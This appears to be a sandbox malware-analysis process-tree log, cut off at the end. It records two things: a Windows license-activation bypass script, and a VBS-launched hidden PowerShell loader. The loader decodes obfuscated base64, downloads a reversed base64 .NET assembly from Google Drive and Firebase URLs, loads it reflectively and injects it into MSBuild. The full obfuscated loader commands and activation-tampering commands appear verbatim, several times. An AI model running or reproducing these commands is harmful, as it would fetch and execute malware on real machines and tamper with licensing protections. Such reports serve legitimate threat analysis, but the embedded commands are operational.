        
        powershell.exe "$netServ = (New-Object Security.Principal.SecurityIdentifier('S-1-5-20')).Translate([Security.Principal.NTAccount]).Value; $aclString = Get-Acl 'Registry::HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies' | Format-List | Out-String; if (-not ($aclString.Contains($netServ + ' Allow FullControl') -or $aclString.Contains('NT SERVICE\sppsvc Allow FullControl')) -or ($aclString.Contains('Deny'))) {Exit 3}"
        5⤵
        
        PID:1032
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE" 2>nul
        5⤵
        
        PID:1432
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE
        6⤵
        
        PID:4452
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "040fa323-92b1-4baf-97a2-5b67feaefddb 0724cb7d-3437-4cb7-93cb-830375d0079d 0ad2ac98-7bb9-4201-8d92-312299201369 1a9a717a-cf13-4ba5-83c3-0fe25fa868d5 221a02da-e2a1-4b75-864c-0a4410a33fdf 291ece0e-9c38-40ca-a9e1-32cc7ec19507 2936d1d2-913a-4542-b54e-ce5a602a2a38 2c293c26-a45a-4a2a-a350-c69a67097529 2de67392-b7a7-462a-b1ca-108dd189f588 2ffd8952-423e-4903-b993-72a1aa44cf82 30a42c86-b7a0-4a34-8c90-ff177cb2acb7 345a5db0-d94f-4e3b-a0c0-7c42f7bc3ebf 3502365a-f88a-4ba4-822a-5769d3073b65 377333b1-8b5d-48d6-9679-1225c872d37c 3df374ef-d444-4494-a5a1-4b0d9fd0e203 3f1afc82-f8ac-4f6c-8005-1d233e606eee 49cd895b-53b2-4dc4-a5f7-b18aa019ad37 4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c 4f3da0d2-271d-4508-ae81-626b60809a38 60b3ec1b-9545-4921-821f-311b129dd6f6 613d217f-7f13-4268-9907-1662339531cd 62f0c100-9c53-4e02-b886-a3528ddfe7f6 6365275e-368d-46ca-a0ef-fc0404119333 721f9237-9341-4453-a661-09e8baa6cca5 73111121-5638-40f6-bc11-f1d7b0d64300 7a802526-4c94-4bd1-ba14-835a1aca2120 7cb546c0-c7d5-44d8-9a5c-69ecdd782b69 82bbc092-bc50-4e16-8e18-b74fc486aec3 8ab9bdd1-1f67-4997-82d9-8878520837d9 8b351c9c-f398-4515-9900-09df49427262 90da7373-1c51-430b-bf26-c97e9c5cdc31 95dca82f-385d-4d39-b85b-5c73fa285d6f a48938aa-62fa-4966-9d44-9f04da3f72f2 b0773a15-df3a-4312-9ad2-83d69648e356 b4bfe195-541e-4e64-ad23-6177f19e395e b68e61d2-68ca-4757-be45-0cc2f3e68eee bd3762d7-270d-4760-8fb3-d829ca45278a c86d5194-4840-4dae-9c1c-0301003a5ab0 d552befb-48cc-4327-8f39-47d2d94f987c d6eadb3b-5ca8-4a6b-986e-35b550756111 df96023b-dcd9-4be2-afa0-c6c871159ebe e0c42288-980c-4788-a014-c080d2e1926e e4db50ea-bda1-4566-b047-0ca50abc6f07 e558417a-5123-4f6f-91e7-385c1c7ca9d4 e7a950a2-e548-4f10-bf16-02ec848e0643 eb6d346f-1c60-4643-b960-40ec31596c45 ec868e65-fadf-4759-b23e-93fe37f2cc29 ef51e000-2659-4f25-8345-3de70a9cf4c4 f7af7d09-40e4-419c-a49b-eae366689ebd fa755fe6-6739-40b9-8d84-6d0ea3b6d1ab fe74f55b-0338-41d6-b267-4a201abe7285 " "
        5⤵
        
        PID:180
    - - C:\Windows\System32\find.exe
        
        find /i "4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c"
        5⤵
        
        PID:1756
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call InstallProductKey ProductKey="VK7JG-NPHTM-C97JM-9MPGT-3V66T"
        5⤵
        
        PID:5860
    - - C:\Windows\System32\cmd.exe
        
        cmd /c exit /b 0
        5⤵
        
        PID:4944
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call RefreshLicenseStatus
        5⤵
        
        PID:5556
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg query "HKCU\Control Panel\International\Geo" /v Name 2>nul
        5⤵
        
        PID:2544
      - C:\Windows\System32\reg.exe
        
        reg query "HKCU\Control Panel\International\Geo" /v Name
        6⤵
        
        PID:2060
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg query "HKCU\Control Panel\International\Geo" /v Nation 2>nul
        5⤵
        
        PID:5328
      - C:\Windows\System32\reg.exe
        
        reg query "HKCU\Control Panel\International\Geo" /v Nation
        6⤵
        
        PID:5368
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c powershell.exe [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("""OSMajorVersion=5;OSMinorVersion=1;OSPlatformId=2;PP=0;Pfn=Microsoft.Windows.48.X19-98841_8wekyb3d8bbwe;PKeyIID=465145217131314304264339481117862266242033457260311819664735280;$([char]0)"""))
        5⤵
        
        PID:324
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("""OSMajorVersion=5;OSMinorVersion=1;OSPlatformId=2;PP=0;Pfn=Microsoft.Windows.48.X19-98841_8wekyb3d8bbwe;PKeyIID=465145217131314304264339481117862266242033457260311819664735280;$([char]0)"""))
        6⤵
        
        PID:3024
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "TwBTAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuAD0ANQA7AE8AUwBNAGkAbgBvAHIAVgBlAHIAcwBpAG8AbgA9ADEAOwBPAFMAUABsAGEAdABmAG8AcgBtAEkAZAA9ADIAOwBQAFAAPQAwADsAUABmAG4APQBNAGkAYwByAG8AcwBvAGYAdAAuAFcAaQBuAGQAbwB3AHMALgA0ADgALgBYADEAOQAtADkAOAA4ADQAMQBfADgAdwBlAGsAeQBiADMAZAA4AGIAYgB3AGUAOwBQAEsAZQB5AEkASQBEAD0ANAA2ADUAMQA0ADUAMgAxADcAMQAzADEAMwAxADQAMwAwADQAMgA2ADQAMwAzADkANAA4ADEAMQAxADcAOAA2ADIAMgA2ADYAMgA0ADIAMAAzADMANAA1ADcAMgA2ADAAMwAxADEAOAAxADkANgA2ADQANwAzADUAMgA4ADAAOwAAAA==" "
        5⤵
        
        PID:3708
    - - C:\Windows\System32\find.exe
        
        find "AAAA"
        5⤵
        
        PID:3692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "Start-Job { Restart-Service ClipSVC } | Wait-Job -Timeout 10 | Out-Null"
        5⤵
        
        PID:1040
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4368
    - - C:\Windows\System32\timeout.exe
        
        timeout /t 2
        5⤵
        Delays execution with timeout.exe
        
        PID:5240
    - - C:\Windows\System32\ClipUp.exe
        
        clipup -v -o
        5⤵
        
        PID:5780
      - C:\Windows\System32\clipup.exe
        
        clipup -v -o -ppl C:\Users\Admin\AppData\Local\Temp\temE826.tmp
        6⤵
        Checks SCSI registry key(s)
        
        PID:216
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')"
        5⤵
        
        PID:5772
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2308
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "Windows 10 Pro" "
        5⤵
        
        PID:2284
    - - C:\Windows\System32\find.exe
        
        find /i "Windows"
        5⤵
        
        PID:6136
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND PartialProductKey IS NOT NULL AND LicenseDependsOn is NULL" call Activate
        5⤵
        
        PID:2736
    - - C:\Windows\System32\cmd.exe
        
        cmd /c exit /b 0
        5⤵
        
        PID:5748
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path SoftwareLicensingProduct where (LicenseStatus='1' and GracePeriodRemaining='0' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get Name /value
        5⤵
        
        PID:6124
    - - C:\Windows\System32\findstr.exe
        
        findstr /i "Windows"
        5⤵
        
        PID:2652
    - - C:\Windows\System32\reg.exe
        
        reg delete "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /v "State" /f
        5⤵
        
        PID:3272
    - - C:\Windows\System32\reg.exe
        
        reg delete "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /v "SuppressRulesEngine" /f
        5⤵
        
        PID:5024
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "Start-Job { Stop-Service sppsvc -force } | Wait-Job -Timeout 10 | Out-Null; $TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('SLpTriggerServiceWorker', 'sppc.dll', 22, 1, [Int32], @([UInt32], [IntPtr], [String], [UInt32]), 1, 3); [void]$TB.CreateType()::SLpTriggerServiceWorker(0, 0, 'reeval', 0)"
        5⤵
        
        PID:5332
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1432
    - - C:\Windows\System32\mode.com
        
        mode 76, 33
        5⤵
        
        PID:4380
    - - C:\Windows\System32\choice.exe
        
        choice /C:123456789H0 /N
        5⤵
        
        PID:928

C:\Windows\system32\Clipup.exe
"C:\Windows\system32\Clipup.exe" -o
1⤵
PID:1620
- C:\Windows\system32\Clipup.exe
  "C:\Windows\system32\Clipup.exe" -o -ppl C:\Windows\TEMP\temE16F.tmp
  2⤵
  - Checks SCSI registry key(s)
  PID:180

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Checks computer location settings
PID:5496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    PID:6088
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:896

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Checks computer location settings
PID:5024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    PID:5280
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5648

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Checks computer location settings
PID:4000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlN